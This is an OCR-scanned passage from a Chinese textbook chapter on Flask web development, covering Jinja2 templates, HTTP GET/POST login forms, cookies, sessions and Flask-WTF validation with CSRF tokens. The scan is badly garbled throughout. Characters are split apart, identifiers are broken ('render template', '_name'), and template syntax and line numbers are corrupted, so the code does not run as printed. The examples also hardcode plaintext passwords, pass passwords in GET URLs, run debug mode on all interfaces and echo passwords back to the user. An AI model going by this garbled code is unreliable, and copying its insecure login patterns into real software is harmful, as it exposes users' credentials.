第 10 行 ,调用 render_template() 函 数 ,并 给 这 个 函数 赋予 了 模板 文件 名 和 一 些 变 量 作 
为 参数 。 变 量 将 替换 掉 模 板 中 的 变量 占 位 符 , 并 返回 泻 染 后 的 模板 。 

在 Flask 底层 ,render_template() 函 数 实际 上 是 调用 了 Flask 的 一 个 组 件 : Jinja2 模板 
处 理 引擎 。 是 Jinja2 用 导入 的 变量 蔡 换 掉 了 模板 中 对 应 的 {{.….)} 代 码 块 。 

人 注意: 模板 index. html 文件 放 在 webapp/templates 目录 下 ,views01. py 程序 文 


件 放 在 webapp/ 目 录 下 ,以 后 依 此 类 推 。 
模板 示例 网 页 效果 如 图 13-8 所 示 。 
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图 13-8 模板 示例 网 页 效果 


2. 模板 中 的 流程 控制 


Jinja2 还 支持 流程 控制 ,通过 流程 控制 可 以 使 模板 文件 更 智能 。 
例 [index01. html】 


1. < htm]l > 

2 <head> 

3 <meta http - equiv = "Content ~ Type" content = "text/html; charset = UTF - 8" /> 
4 {% if title %} 

5. <title>{{title}} - 微 博 </title> 
6 {% else %} 

7 <title > 欢迎 访问 微 博 </title> 

8 {% endif %} 

9 </head> 

10. <body> 

11. < hl > 您 好 ,{{user. nickname}}!</hl> 
12. </body> 

13. </html > 


如 果 在 视图 函数 中 忘记 定义 页 面 标题 变量 title 了 . 它 将 会 使 用 自己 的 标题 (“欢迎 访问 


微 博 ”) 替 代 。 现 在 把 视图 函数 中 render_template() 里 的 title 变量 取消 ,网 页 效果 如 图 13-9 
所 示 。 


[ec le 


a 





图 13-9 模板 流程 控制 网 页 效果 


3. 模板 中 使 用 循环 


微 博 中 可 能 会 显示 多 个 好 友 发 表 的 文章 ,这 时 就 需要 用 到 循环 来 处 理 数据 。 下 面 例 程 
展示 了 在 模板 中 调用 循环 显示 多 个 好 友 的 功能 。 
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例 [views02. py】 

1. 井 一 *#* 一 encoding:utf 一 8 一 * 一 

2. from flask import Flask, render template 
3 

4. app = Flask(_ name ) 

3 

6. @app.route('/') 

7. @app. route('/index') 

8. def index(): 

9. user = { 'nickname': ' 李 四 '} 

10. posts = [ 

1 { 

12; 'author': { 'nickname': ' 王 五 ' }， 
bk "body': ' 海 岛 休闲 一 日 游 !' 

14. by 

15. { 

16. 'author': { 'nickname': ' 麻 六 ' 
Eb 'body': ' 密 林 探 险 三 日 游 !" 

18. } 

19. ] 

20, return render template("index03. html", 
21, title = ' 首 页 '， 

22. user = user, 

23， posts = posts) 

24. 

25. if _name == ' main_': 

26. app. run( host = '0.0.0.0',port = 80, debug = True) 


(说明: 第 10 行 ,定义 了 列表 posts, 列 表 的 元 素 是 字典 ,字典 中 包括 博客 的 作者 、 博 





客 的 内 容 。 
模板 【index02. html】 
1. < html > 
<head > 
3 <meta http - equiv = "Content - Type" content = "text/html; charset = UTF — 8" /> 
4 % if title %} 
3 <title>{{title}} - 微 博 </title> 
6 % else %} 
了 <title> 欢 迎 访问 微 博 </title> 
8 % endif %} 
9. </head> 
10. <body> 
< hl > 您 好 ,{ {user. nickname}}!</hl> 
2， % for post in posts %} 
5 <p>{{post.author. nickname}} 写 了 : <b>{{post. body} }</b></p> 
14. % endfor %} 
15. </body> 


16. </html> 
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本 说 明 : 第 12 行 ,使 用 for 循环 显示 posts 列表 中 的 每 个 元 素 。 
第 13 行 , 显 示 post 中 的 author 字典 的 nickname 值 , 显 示 post 中 的 body 值 。 
4. 模板 继承 
网 页 设计 中 经 常会 用 到 导航 条 ,网 页 也 会 有 页 眉 或 者 页 脚 ,可 以 直接 把 这 些 内 容 加 入 网 
页 中 ,但 是 很 多 网 页 都 需要 页 眉 、 页 脚 和 导航 条 ,如 果 多 次 修改 ,势必 会 增加 网 页 编写 的 工作 
量 , 好 在 Jinja2 提供 了 模板 继承 功能 ,可 以 把 许多 网 页 都 会 用 到 的 基本 元 素 放 和 人 基 模 板 中 ， 
其 他 模板 继承 这 个 基 模 板 就 可 以 了 。 


基 模 板 【base. html] 

1. < htm]l > 

2 <head> 

3 <meta http - equiv = "Content - Type" content = "text/html; charset = utf — 8" /> 
4 {% iftitle %} 

上 <title>{{title}} - 微 博 </title> 
6 {% else %} 

<title > 欢迎 访问 微 博 </title> 

8 {% endif %} 

9 </head> 

10. <body> 

:5 {% block content $%}{% endblock %} 
12, </body > 

13. </html> 


基 模 板 base. html 中 使 用 了 block 控制 语句 来 定义 继承 模板 内 容 的 显示 位 置 。content 
是 这 个 block 控制 语句 中 设置 的 名 称 , 该 名 称 在 模板 中 必须 唯一 。 

接 下 来 修改 一 下 index02. html 模板 ,让 它 继承 于 刚刚 添加 的 基 模 板 base. html。 

模板 【index03. html】 
{% extends "base.html" %} 
{% block content %} 
< hl > 欢迎 ,，{ {user. nickname}}!</hl > 
{% for post in posts %} 
<div><p>{{post. author. nickname}} 写 了 :<b>{{post. body} }</b></p></div> 
{% endfor %} 
{% endblock %} 

基 模 板 base. html 设 定 了 页 面 结构 和 公共 内 容 , 因 此 index03. html 模板 就 成 了 这 幅 样 
子 。extends 语句 使 两 个 模板 关联 了 起 来 。Jinja2 在 泻 染 index03. html 模板 时 , 发现 
extends 语句 ,就 会 自动 先 引 入 base. html 基 模 板 , 并 对 两 个 模板 中 名 为 content 的 block 控 
制 语句 进行 匹配 。Jinja2 知道 如 何 把 两 个 模板 合并 到 一 起 。 


IIAPr 


13.2.3 表单 
表单 是 Web 程序 设计 中 经 常 使 用 的 一 种 工具 ,通过 表单 客户 端 把 数据 提交 给 服务 器 
端 ,表单 通过 一 form method 二 "..." 二 .… 一 /form> 来 定义 ,这 里 涉及 HTTP 提交 数据 的 方 


法 , 表 13-1 列 出 了 常见 的 HTTP 方法 。 
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表 13-1 常见 的 HTTP 方法 
方法 描 述 
GETO) 浏览 器 通知 服务 器 只 获取 页 面 上 的 信息 并 且 发 送 回来 ,这 是 最 常用 的 方法 


浏览 器 通知 服务 器 它 要 在 URL 上 “提交 ”一 些 信息 ,服务 器 必须 保证 数据 被 存储 且 只 存储 
一 次 ,这 是 HTML 表单 通常 发 送 数据 到 服务 器 的 方法 


PUT() 同 POST() 方 法 类 似 , 但 是 服务 器 可 能 触发 了 多 次 存储 过 程 , 多 次 覆盖 掉 旧 值 
DELETE() | 移 除 给 定位 置 的 信息 








POST() 











HTTP 使 用 不 同 的 方法 访问 URL, 表 单 的 提交 方式 主要 有 POST() 方 法 和 GET() 方 
法 ,那么 POST() 方 法 与 GET() 方 法 有 何不 同 呢 ? 

首先 ,提交 数据 的 方式 不 同 。GET() 方 法 将 表单 中 的 数据 按照 variable= value 的 形 
式 , 添 加 到 URL 后 面 ,URL 与 variable 之 间 用 ? 连接 ,各 个 变量 之 间 使 用 & 连接 ,如 http:// 
192. 168. 1. 100/get? username 一 admin&password 一 123456; 而 POST() 方 法 则 采用 以 数 
据 块 的 形式 向 服务 器 传输 数据 。 

其 次 ,安全 性 问题 。 因 为 GET() 方 法 在 传输 过 程 中 数据 被 放 在 请 求 的 URL 中 ,而 如 今 
现 有 的 很 多 服务 器 代理 服务 器 或 者 用 户 代理 都 会 将 请 求 URL 记录 到 日 志文 件 中 ,然后 放 
在 某 个 地 方 ,这 样 就 可 能 会 有 一 些 隐私 的 信息 被 第 三 方 看 到 ,因此 ,GETO) 方 法 传输 方式 不 
太 安 全 ; 而 POSTO 方 法 因数 据 在 块 中 则 显得 相对 较 安全 。 

最 后 ,GET() 方 法 因为 受 URL 长 度 限制 ,传输 的 数据 量 相 对 较 小 ; 而 POST() 方 法 数 
据 块 包含 的 数据 量 相 对 较 大 ,因而 传输 的 数据 量 较 多 。 

至 于 两 种 方式 的 优 劣 还 是 仁者 见 仁 , 智 者 见 智 , 没 有 绝对 的 划分 。 默 认 情况 下 , Flask 
路 由 只 会 响应 GET() 方 法 ,表单 通常 情况 下 会 使 用 POST() 方 法 提交 数据 给 服务 器 。 

客户 端 与 服务 器 端 进行 交互 的 过 程 中 ,还 会 涉及 两 个 对 象 : Request 对 象 和 Response 
对 象 ,Request 对 象 主 要 用 于 描述 请 求 相关 的 一 些 属性 ,Response 对 象 用 于 描述 响应 相关 的 
属性 。Request 属性 如 表 13-2 所 示 ,Response 属性 如 表 13-3 所 示 。 


表 13-2 Request 属性 






































属 性 描 述 
args 全 部 参数 的 字典 
path 请 求 的 路 径 , 如 request. path = 二 = 二"'/hello' 
environ 潜在 的 WSGI 环境 
headers 传人 的 响应 头 
remote_addr 客户 端 地 址 
form form 提交 的 参数 ,如 request. form[ 'username'] 
method 请 求 的 方法 ,如 request. method = 二 二 'POST' 
values args 和 form 的 集合 
json json 格式 的 body 数据 
cookies Request 对 象 传送 的 所 有 cookies 内 容 的 字典 
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表 13-3 Response 属性 




















属 性 描 述 
status 表示 响应 状态 的 字符 串 
status_code 表示 响应 状态 的 整数 
headers 描述 响应 头 的 headers 对 象 
mimetype 响应 的 mimetype 类 型 
data 调用 get_data() 方 法 和 set_data() 方 法 的 描述 符 


1. POST() 方 法 提交 表单 


下 面 以 最 常见 的 POST() 方 法 表单 登录 界面 为 例 , 讲 解 Flask 中 表单 的 使 用 。 首 先 创 
建 plogin. html 文件 ,将 其 放 到 应 用 的 /templates 文件 夹 下 。 





模板 【plogin. html】 

1. < html > 

4 <head> 

3 <title > 请 登录 </title> 

4 <meta http - equiv = "Content - Type" content = "text/html; charset = UTF - 8" /> 

5 </head > 

6 <body > 

7 < form method = 'post' action = "/postlogin" name = "login"> 

8 <h3 align = "center">{{login message}}</h3><br> 

9. <h4 align = "center"> 登 录 名 : < input name = "username" type = "text"></h4 >< br> 
10. < h4 align = "center"> 密 码 : < input name = "password" type = "password"></h4><br> 
EE <h4 align = "center">< button type = "submit"> 登 录 </button ></h 

12; </form> 

13. </body > 

14. </html > 


(村 说 明 : 第 7 一 12 行 ,使 用 一 form>.…</form> 标 签 定义 了 一 个 表单 ,表单 的 


method 为 post, 即 使 用 POST() 方 法 传递 数据 给 服务 器 ,action 王 "/postlogin" 指 定 了 用 户 
提交 数据 后 由 URL 值 为 /postlogin 的 程序 来 处 理 表单 数据 ,也 就 是 表单 的 action 值 为 要 处 
理 该 表单 数据 的 路 由 。 

第 8 行 ,定义 了 一 个 变量 {{login_message}}, 用 于 显示 登录 信息 ,如 “请 登录 ”或 “请 重 
新 登录 ”等 。 使 用 二 h3 align 王 "center" 二 标签 使 其 水 平 居 中 。 

第 9 行 ,定义 了 一 个 表单 变量 ,name 一 "username" 指 定 了 变量 名 为 username,type 一 
"text" 指 定 该 变量 为 文本 框 。 

第 10 行 ,定义 了 另 一 个 表单 变量 password, type 一 "password" 指定 其 类 型 为 
password, 即 输入 密码 时 ,将 显示 为 。。 

第 11 行 ,通过 二 button type 一 "submit" 过 定义 了 一 个 提交 按钮 ,显示 为 “登录 ”。 

程序 【loginpost. py】 

了 ng 一 本 一 


2. from flask import Flask, render template, request 
人 
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app = Flask(_name ) 


def login() : 


4 

5 

6. (@app.route("/login/") 

7 

8 return render_template("plogin. html", login _message = "请 登录 ") 
9 


10. (@app. route('/postlogin', methods = ['POST']) 
11. def loginresponse( ): 


12. if request. method == "POST': 

13; # 表单 使 用 POST( ) 方 法 传递 的 数据 保存 在 request. forn 中 
14. username = request. form.get('username', 'username') 

5 passwd = request. form. get('password', 'password') 

16. if username == 'admin' and passwd == '123456°": 

7 return '< h3 > 你 好 ，% s!</h3 >'% (username) 

18. else: 

19. return render_template("plogin. html", login_message = "用 户 名 或 密码 错误 ,请 
重新 登录 ") 

20. 

21. if name == ' main_': 

22. app. run( host = '0.0.0.0',port = 80, debug = True) 


(可 说 明 : 第 2 行 , 若 用 到 Request 对 象 ,必须 导入 Request, 语 句 为 from flask import 
request。 

第 6 行 , 定 义 了 一 个 /login/ 的 路 由 。 

第 8 行 ,render_template() 函数 指定 使 用 模板 plogin. html, 并 指定 模板 中 的 login_ 
message 变量 值 为 “请 登录 ”。 

第 10 行 ,定义 了 一 个 名 为 /postlogin 的 路 由 ,并 指定 使 用 POST() 方 法 处 理 表 单数 据 。 

第 12 行 ,判断 请 求 方式 (这 里 是 表单 提交 方式 ) 是 否 为 POST() 方 法 , 若 为 POST() 方 
法 进行 下 一 步 处 理 。 

第 14 行 ,从 提交 的 表单 中 获取 username 值 ,POST() 方 法 提交 的 表单 变量 值 保存 在 
request. form 中 ,取得 表单 参数 值 有 多 种 方法 ,如 request. form[ 'abc'] form. get('abc') 和 
request. form. get('abc', 'default value') 。 建 议 使 用 request. form. get('abe', 'default value'") 方 法 ， 
若 表单 中 没有 'abc',request. form. get('abc', 'default value') 会 返回 'default value'。 如 果 用 
request. form. get('abc') 则 返回 None; 如 果 用 request. form. get[ 'abc'], 则 抛 出 400 异常 ， 
整个 HTTP Request 都 不 可 用 。 

第 19 行 , 若 输入 的 用 户 名 与 密码 不 正确 , 则 重新 定位 到 plogin. html, 并 且 设 置 login_ 
message 变量 值 为 “用 户 名 或 密码 错误 ,请 重新 登录 ”; 若 正确 则 在 网 页 上 显示 “你 好 ,用 户 名 ”。 

2. GET() 方 法 提交 表单 

与 上 例 的 编程 相似 ,首先 构造 一 个 glogin. html 模板 文件 。 


例 [glogin. html】 

1. < html > 

<head> 

和 <title> 请 登录 </title> 

4 <meta http - equiv = "Content - Type" content = "text/html; charset = UTF — 8" /> 
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和 </head > 

6 <body> 

人 < form method = 'get' action = "/getlogin" name = "1ogin"> 

8 <h3 align = "center">{{login message}}</h3><br> 

9 <h4 align = "center"> 登 录 名 : < input name = "username" type = "text"></h4 >< br> 
10. <h4 align = "center"> 密 码 : < input name = "password" type = "password"></h4 ><br> 
4 <h4 align= "center">< button type = "submit"> 登 录 </button></h 

12. </form> 

13. </body> 

14. </html> 

在 此 html 文件 中 ,最 重要 的 变化 是 第 7 行 ,method 改 为 了 get,action 改 为 了 /getlogin。 
例 [loginget. py】 

1. 捍 一 * 一 coding:utf-8 一 * 一 

2. from flask import Flask, render template, request 

EE 

4. app = Flask(_name ) 

上 

6. (@app.route("/login/") 

7, def login(): 

8. return render_template("glogin. html", login_message = "请 登录 ") 

9 


10. @app. route( '/getlogin'，methods = ['GET']) 
11. def loginresponse( ) : 


12, if request. method == "GET': 

Ec # 表 单 使 用 GET() 方 法 传递 的 数据 保存 在 request.args 中 
14. uname = request.args.get("username", "username") 

上 passwd = request.args.get("password","password") 

16. if uname == 'lisi'and passwd == '123456": 

17. return '< h3 > 你 好 ，% s!</h3 >'% (uname) 

18. else: 

19. return render_template("glogin. html", login_message = "用 户 名 或 密码 错误 ,请 
重新 登录 ") 

20. 

21. if _name == ' main_': 

Ss app. run( host = '0.0.0.0',port = 80, debug = True) 


此 段 程 序 中 最 值得 注意 的 是 ,GET() 方 法 传输 的 数据 ,在 Flask 中 需要 通过 request. 
args. get() 方 法 获取 ,这 一 点 不 同 于 POST() 方 法 表单 变量 的 获取 方法 。 

运行 该 程序 : 

> python getlogin.py 


输入 用 户 名 与 密码 后 , 单 击 “ 登 录 ” 按 钮 ,程序 采用 GET() 方 法 把 数据 传输 给 服务 器 ,这 
时 浏览 器 的 地 址 栏 中 是 类 似 于 下 面 的 URL 值 : 


http://192.168.1.100/getlogin?username = lisi&password = 123456 


3. Cookies 和 Session 设置 
在 本 章 开始 的 时 候 , 提 到 过 HTTP 是 一 种 基于 请 求 与 应 答 的 无 状态 网 络 协议 ,请 求 与 
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应 答 就 是 客户 端 提出 访问 请 求 , 服 务 器 端 给 出 相应 的 应 答 ,请 求 与 应 答 都 是 相对 独立 的 , 服 
务 器 端 不 需要 记录 客户 端的 行为 状态 ,只 会 对 URL 请 求 做 出 应 答 , 这 是 无 状态 的 ,也 就 是 
说 ,每 次 的 请 求 都 是 独立 的 , 它 的 执行 情况 和 结果 与 前 面 的 请 求 和 之 后 的 请 求 没 有 直接 
的 关系 , 它 不 会 受 前 面 请 求 应 答 情 况 的 直接 影响 ,也 不 会 直接 影响 后 面 的 请 求 应 答 情况 。 
然而 , Web 应 用 是 需要 承前启后 的 ,比如 ,电子 商务 的 Web 应 用 程序 需要 记 住 哪 个 客户 选 
购 了 什么 商品 ,因此 ,需要 保存 用 户 HTTP 连接 状态 的 技术 ,Cookies 和 Session 就 是 这 样 
的 技术 。 

Cookies 就 是 由 服务 器 端 发 给 客户 端的 特殊 信息 ,而 这 些 信息 以 文本 文件 的 方式 存放 
在 客户 端 ,然后 客户 端 每 次 向 服务 器 端 发 送 请 求 的 时 候 都 会 带 上 这 些 特殊 的 信息 ,而 这 些 特 
殊 信 息 (Cookies) 则 存放 在 HTTP 请 求 头 中 。Windows 中 ,Cookies 是 存放 在 [系统 盘 ]:/ 
Documents and Settings/[ 用 户 名 ]/Cookies 目录 中 的 。 

与 Cookies 相对 应 的 另 一 种 技术 是 Session。Session 是 服务 器 端 为 客户 端 所 开辟 的 存 
储 空间 ,在 其 中 保存 的 信息 用 于 保持 客户 端的 状态 。 在 创建 Session 的 同时 ,服务 器 端 会 为 
该 Session 生成 唯一 的 Session ID, 而 这 个 Session ID 在 随后 的 请 求 中 会 被 用 来 重新 获得 已 
经 创建 的 Session; 在 Session 被 创建 之 后 ,就 可 以 调用 Session 相关 的 方法 往 Session 中 增 
加 内 容 了 ,而 这 些 内 容 只 会 保存 在 服务 器 中 ,发 到 客户 端的 只 有 Session ID; 当 客户 端 再 次 
发 送 请 求 的 时 候 , 会 将 这 个 Session ID 带 上 ,服务 器 端 接收 到 请 求 之 后 就 会 依据 Session ID 
找到 相应 的 Session, 从 而 再 次 使 用 它 。 

下 面 来 说 明 Flask 应 用 中 如 何 设置 与 获取 Cookies 和 Session。 

(1) 读 取 Cookies。 

Request 对 象 的 Cookies 属性 就 是 一 个 客户 端 发 送 的 所 有 Cookies 的 字典 。 读 取 
Cookies 的 方法 是 : 首先 导入 Request, 然 后 使 用 request. cookies. get( ' 变 量 名 ') 即 可 读 取 
Cookies 中 该 变量 的 值 ,也 可 以 使 用 request. cookies[ ' 变 量 名 '] 获 取 。 

(2) 设置 Cookies。 

Cookies 是 在 响应 对 象 中 被 设置 的 ,因此 使 用 类 似 以 下 语句 即 可 设置 Cookies: 


response. set_cookie( 'username', 'the username') 
为 了 让 Cookies 值 更 长 久 一 些 , 可 以 加 上 过 期 时 间 , 如 : 
response. set_ cookie( 'username',] username,max age = 1800) 


(3) 读 取 Session。 

从 Flask 导入 Session 后 ,通过 session[ 'username'] 即 可 直接 读 取 username 的 值 了 。 

(4) 设置 Session。 

通过 session[ ' 变 量 名 '] 二 “ 值 * 即 可 设置 Session 值 。 下 面 的 语句 ,实现 读 取 表单 中 的 
username 变量 值 , 并 将 其 写 人 Session 中 。 


session[ 'username'] = request. form. get('username', 'username') 


人 注意 : 在 设置 Session 值 之 前 ,一 定 要 设置 app. secret_key 的 值 ,因为 Session 是 用 
证 书 加 密 的 ,证 书 需 要 一 个 加 密 的 密 钥 。 





第 13 章 ”Web 程序 开发 Ce 


1) Cookies 读 取 设置 示例 
程序 [login_cookies. py】 


井 -* 一 coding:utf-8 -= 关 一 
from flask import Flask, render template, request, make response, redirect, url for 


app = Flask(_name ) 


@app. route( '/') 
def index(): 


if 'username' in request. cookies: 

return ' 你 已 经 作为 : %s 登录 过 了 。' % request. cookies. get( 'username') 
else: 

return render_template(" login. html", login message = "请 先 登 录 ") 


13. @app.route('/login/', methods = ["POST']) 
14. def login(): 


15. if request. method == "POST': 

16. 1_username = request. form. get( 'username', 'default value') 
Fp passwd = request. form. get('password', 'default value') 

18. if 1 username == 'lisi'and passwd == '123456°': 

19. resp = app. make response(redirect('/')) 

20. resp. set_cookie( 'username', ] username, max age = 1800) 
23， return resp 

2 return render_template("login. html", login_message = "用 户 名 或 密码 错误 ,请 重新 
登录 ") 

23. 

24. if _name == ' main_': 

25, app. run( host = '0.0.0.0',port = 80, debug = True) 


程序 在 路 径 */* 处 根据 Cookies 判断 用 户 是 否 登 录 过 , 若 登录 过 , 则 显示 用 户 的 登录 名 ; 
若 未 登录 过 , 则 转 到 /login. html 模板 让 用 户 登 录 , 登 录 成 功 后 转 至 /显示 登录 名 ,登录 错误 


则 重新 登录 。 


(可 说 明 : 第 8 行 ,判断 request. cookies 中 是 否 包 括 username。 


第 9 行 ,通过 request. cookies. get('username') 读 取 Cookies 中 username 的 值 ,也 可 以 
使 用 request. cookies[ 'username'] 获 取 。 

第 11 行 , 泻 染 login. html 模板 ,login_message 变量 值 为 “请 先 登 录 ”。 

第 13 行 ,定义 了 /login/ 路 由 ,Request 方法 为 POST() 。 

第 15 行 , 若 Request 方法 为 POST() 时 ,执行 16 一 22 行 代码 。 

第 16 行 ,获取 表单 中 username 的 值 . 若 无 username 则 返回 default value。 

第 17 行 ,获取 表单 中 password 的 值 , 若 无 password 则 返回 default value。 

第 19 行 , 使 用 app. make_response() 方 法 生成 response 对 象 的 实例 ,这 个 响应 就 是 重 
定向 到 一 个 URL, 这 里 的 URL 是 /。 

第 20 行 ,使 用 resp. set_cookie(' 键 ', 值 ) 设 置 Cookies, 这 里 设置 Cookies 必须 是 对 某 个 
响应 (response) 进 行 设置 。 

第 21 行 ,返回 刚 生 成 的 响应 resp。 
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第 22 行 ,返回 login. html 模板 ,login_message 变量 的 值 为 “用 户 名 或 密码 错误 ,请 重新 


登录 ”。 


2) Session 读 取 设 置 示例 
程序 【login_session. py】 


1. 间 -*- coding:utf-8-*- 
2. from flask import Flask, render template, request, session, redirect, url for,escape 
3. import os 

4. 

5. app = Flask(_ name ) 

6. app.secret key = os.urandom(24) 

9 

8. @app.route('/') 

9. def index(): 

10. if "username' in session: 

11. return ' 亲 爱 的 % s ,您 已 经 登录 过 了 ' % escape(session[ 'username']) 
12. else: 

13. # return 'You are not logged in' 

14. return redirect(url for('login')) 

EL 

16. @app.routel('/login/', methods = ['GET', 'POST']) 

17. def login(): 

18. if request. method == 'GET': 

19. return render_template("login. html", login_message = "请 登录 ") 

20. elif request. method == "POST': 

2 1_username = request. form. get( 'username', 'not found') 

2 #print('form. username: % s'%1 username) 

23。 if 1 username == 'admin' and request. form[ 'password'] == '123456': 
24. session[ 'username'] = 1 username 

25, return redirect(url for('index')) 

26. return render_template("login. html", login_message = "用 户 名 或 密码 错误 ,请 重新 
登录 ") 

27, 

28. @app. route( '/logout') 

29. def logout() : 

30. # 如果 session 中 存在 username, 则 删除 它 

FE 1 session. pop( 'username', None) 

32. return redirect(url_for('index'")) 

33, 

34. if _name == ' main_': 

SS app.run(host = '0.0.0.0',port = 80, debug = True) 


Session() 是 另外 一 种 获取 HTTP 状态 的 方法 ,Session 值 是 保存 在 服务 器 端的 。 一 般 
情况 下 ,关闭 浏览 器 Session 值 就 会 消失 .设置 session. permanent 二 True 后 Session 不 会 
随 着 关闭 浏览 器 自动 消失 ,默认 保存 时 间 为 1 个 月 。 

{可 说 明 : 第 6 行 , 调 用 os. urandom() 方 法 生成 一 个 24 字 节 的 随机 数 作 为 Session 应 
用 的 密 钥 。 

第 10 行 ,判断 Session 中 是 否 存 在 username 键 。 
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第 11 行 , 使 用 session[ ' 键 中] 方法 读 取 Session 值 . 使 用 escape() 方 法 进行 转 义 。 

第 24 行 ,使 用 “session[ ' 键 '] 一 值 ?的 方式 设置 Session 值 。 

4. 更 具 Flask 风格 的 安全 表单 

通过 上 面 的 两 个 例子 ,实现 了 Web 程序 设计 中 最 常见 表单 的 功能 ,但 是 这 两 个 表单 没 
有 数据 验证 功能 ,例如 ,要 求 用 户 名 和 密码 必须 不 能 为 空 , 要 实现 数据 验证 功能 一 般 情况 下 
是 在 HTML 文件 中 加 入 JavaScript 脚本 进行 验证 ,如 果 Web 程序 设计 中 有 很 多 个 表单 , 设 
计 这 些 HTML 模板 及 数据 验证 脚本 将 是 一 件 非常 单调 而 又 烦琐 的 任务 。 同 时 表单 很 容易 
产生 跨 站 请 求 伪 造 (Cross-Site Request Forgery,CSRF) , 它 不 同 于 XSS( 跨 站 攻击 ) ,XSS 利 
用 站 点 内 的 信任 用 户 , 而 CSRF 攻击 则 把 伪装 的 来 自 受 信任 用 户 的 请 求 ( 如 网 银 取款 请 求 ) 
发 送 到 被 攻击 者 已 登录 的 其 他 网 站 ,被 攻击 的 受信 任 者 单 击 这 个 伪装 的 链接 时 就 发 出 了 这 
个 请 求 , 从 而 蒙受 一 定 的 损失 。 避 人 免 CSRF 攻击 的 方法 是 在 表单 中 置 入 一 个 隐藏 的 字段 ,把 
持久 授权 方式 (如 Cookies 或 者 HTTP 授权 ) 切 换 为 瞬时 的 授权 方式 (在 每 个 Form 中 提供 
隐藏 Field) 。 怎 样 能 简单 地 实现 这 些 功能 呢 ? 

Flask 中 提供 了 Flask-WTF 扩展 , 它 把 处 理 Web 表单 变 成 了 一 件 令 人 愉悦 的 事情 。 
Flask-WTF 程序 设置 了 一 个 密 钥 ,并 使 用 这 个 密 钥 生成 加 密令 牌 ,再 用 令 牌 验证 请 求 中 表 
单数 据 的 真 伪 , 从 而 保护 网 站 免 受 CSRF 攻击 。 

下 面 将 介绍 Flask-WTF 的 功能 及 其 应 用 。 

Flask-WTF 的 安装 : 

> pip install flask— wtf 

将 会 安装 WTForms、Flask-WTF 两 个 模块 。 

下 面 使 用 Flask-WTF 实现 上 例 中 的 登录 功能 。 

表单 视图 [wtfform. py】 

1. from flask import Flask, render template, redirect 

2. from flask wtf import FlaskForm 

3 from wtforms import StringField, PasswordField 

4 from wtforms. validators import Required, Length 

5. import os 

6 

7. app = Flask(_name ) 

8. app.config['SECRET KEY'] = os.urandom(24) 

9 


10. class MyForm(FlaskForm): 


11. name = StringField(' 登 录 名 : '，validators = [Required()]) 

12. password = PasswordField( ' 密 码 : '，validators = [Required(), Length(min = 6, max = 
35)]) 

13, 


14. @app.route('/submit', methods = ('GET', 'POST')) 
15. def submit(): 


16. form = MyForm() 
Ey if form. validate on submit(): 
18. return "hello %s, password: %s' % (form.name. data，form. password. data) 


19. return render template( 'submit. html', form= form) 
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20. 
21. if _nane_ ==" main ": 
22. app.run(host = '0.0.0.0',port = 80, debug = True) 


(全 说明 : 第 8 行 ,将 生成 的 密 钥 添加 到 app. config 对 象 中 ,app. config 字典 可 用 来 存 
储 框架 、 扩 展 和 程序 本 身 的 配置 信息 。 

第 10 一 12 行 ,定义 了 一 个 表单 类 。Flask-WTF 中 每 个 Web 表单 都 由 一 个 继承 自 
FlaskForm 的 类 表示 ,类 中 定义 表单 中 的 字段 ,每 个 字段 都 用 对 象 表示 ,字段 对 象 可 附带 一 
个 或 多 个 验证 函数 ,用 于 验证 用 户 提交 的 输入 是 否 符合 要 求 。 

第 11 行 ,定义 了 一 个 name 对 象 ,该 对 象 的 标签 是 “登录 名 : ”, 验 证 器 为 Required() 函 数 ， 
也 就 是 要 求 用 户 必 须 输 入 数据 。 

第 12 行 ,定义 了 一 个 password 对 象 , 该 对 象 的 标签 是 “密码 : ”, 验 证 函数 有 两 个 ; 
Required()、 LengthCmin 王 6，max 一 35) ,也 就 是 用 户 必 须 输 入 数据 ,并 且 长 度 为 6 一 35 个 
字 节 。 

第 15 一 19 行 ,与 以 前 小 节 的 登录 模块 中 路 由 器 的 功能 是 一 样 的 。 

第 17 一 18 行 , 若 验 证 通过 , 则 显示 用 户 输入 的 用 户 名 和 密码 。 获 取 用 户 输 入 的 方法 是 : 
表单 对 象 . 字段 对 象 . data。 

表单 模板 【submit. html】 


1. <html > 

2. <head > 

3 <title> submit </title> 

4 <meta http - equiv = "Content - Type" content = "text/html; charset = UTF — 8" /> 
5. </head> 

6 <body> 

第 < form method = "POST" action = "/submit"> 

8 {{ form. hidden tag() }} 

9 {{ form. name. label }} {{ form.nanme(size= 20) }}<p> 


10. {{form. password. label}} {{form.password(size= 20)}}<p> 
1 < input type = "submit"” value = "提交 "> 

a </form> 

3 </body > 

14. </html > 


( 生 说 明 : 第 7~12 行 ,定义 了 一 个 表单 ,表单 的 方法 为 POST() ,表单 的 处 理 路 径 为 / 
submit 。 

第 8 行 ,定义 了 一 个 隐藏 的 字段 form. hidden_tag() 。 

第 9 行 ,定义 了 一 个 字段 form. name, {{ form. name. label }} 为 name 对 象 的 标签 ， 
{{ form. name(size 一 20) 作为 字段 输入 框 ,并 指定 其 宽度 为 20 字符 。 

第 10 行 ,定义 了 一 个 字段 form. password。 

第 11 行 ,定义 了 一 个 按钮 “提交 ”; 在 表单 提交 数据 时 ,name 字段 必须 输入 数据 ， 
password 字段 必须 输入 数据 ,并 且 长 度 为 6 一 35 个 字符 。 

通过 上 例 看 到 了 Flask-WTF 的 强大 功能 ,那么 Flask-WTF 有 哪些 字段 类 型 和 验证 函 
数 呢 ? 请 参考 表 13-4 和 表 13-5。 
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表 13-4 Flask-WTF 字段 类 型 


















































字段 类 型 说 明 
StringField 文本 字段 
PasswordField 密码 文本 字段 
TextAreaField 多 行文 本 字段 
HiddenField 隐藏 文本 字段 
IntegerField 文本 字段 , 值 为 整数 
FloatField 文本 字段 , 值 为 浮 点 数 
BooleanField 复 选 框 , 值 为 True 和 False 
DecimalField 文本 字段 , 值 为 decimal. decimal 格式 
RadioField 一 组 单 选 框 
SelectField 下 拉 列 表 
SelectMultipleField 下 拉 列 表 , 可 选择 多 个 值 
FileField 文件 字段 ,用 于 文件 上 传 
FieldList 一 组 指定 类 型 的 字段 
DateField 文本 字段 , 值 为 datetime. date 格式 
DateTimeField 文本 字段 , 值 为 datetime. datetime 格式 
FormField 把 表单 作为 字段 嵌入 另 一 个 表单 





SubmitField 





表单 提交 按钮 


表 13-5 ”Flask-WTF 验证 函数 


验证 函数 


说 明 





Email(message 一 None) 


验证 电子 邮件 地 址 ,message 为 验证 失败 时 的 提 
示 信 息 





EqualTo(fieldname，、message 一 None) 


比较 两 个 字段 的 值 ; 常用 于 要 求 输入 两 次 密码 进 
































行 确认 的 情况 

IPAddress(message 一 None) 验证 IPv4 网 络 地 址 
